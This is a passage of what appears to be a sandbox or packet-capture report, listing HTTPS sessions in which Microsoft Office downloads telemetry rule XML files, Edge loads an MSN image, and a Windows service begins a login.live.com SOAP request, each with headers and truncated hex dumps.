
Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	49918	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 7f4584eb-c01e-008e-75d5-337381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968pf68xhC1EWRr4h8000000050g000000003vu8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49917	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 1c99ed40-601e-0097-39d5-33f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968nnm4mhC1EWR1rn400000004ng0000000070ne x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49919	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 5f7107d8-901e-0048-05d5-33b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968xlwnmhC1EWR0sv800000004pg0000000012m2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49920	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: c08ebcb6-401e-0064-7bd5-3354af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968l4kp6hC1EWRe8840000000530000000000tc2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49921	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 99a87d01-601e-005c-42d5-33f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968nnm4mhC1EWR1rn400000004pg000000006pf5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49922	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	505	OUT	GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:32 UTC	548	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Tue, 29 Oct 2024 19:03:22 GMT X-Source-Length: 95457 X-Datacenter: westus X-ActivityId: 155cd87c-435f-4d80-bfaf-3f0e9ec39163 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 8192 Cache-Control: public, max-age=120466 Expires: Tue, 12 Nov 2024 19:01:18 GMT Date: Mon, 11 Nov 2024 09:33:32 GMT Connection: close
2024-11-11 09:33:32 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	49924	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: c08ebcd4-401e-0064-18d5-3354af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968frfdmhC1EWRxxbw00000004t0000000005eqn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	49925	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 9a2be917-a01e-0053-13d5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968vwdr7hC1EWRsh3w00000004kg00000000a4q1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	49926	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 1815edcd-001e-0028-0ed5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968n2hr8hC1EWR9cag00000004ag0000000073xq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	49927	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 1c14dccd-c01e-0079-70d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968j9dchhC1EWRfe7400000004f0000000009ty7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49923	40.126.31.69	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 09:33:32 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 09:33:32 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 09:32:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C527_BAY x-ms-request-id: 379972fa-a65a-4332-8424-78a9ac84d730 PPServer: PPV: 30 H: PH1PEPF00011FF5 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 09:33:32 GMT Connection: close Content-Length: 11391
2024-11-11 09:33:32 UTC	11391	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" 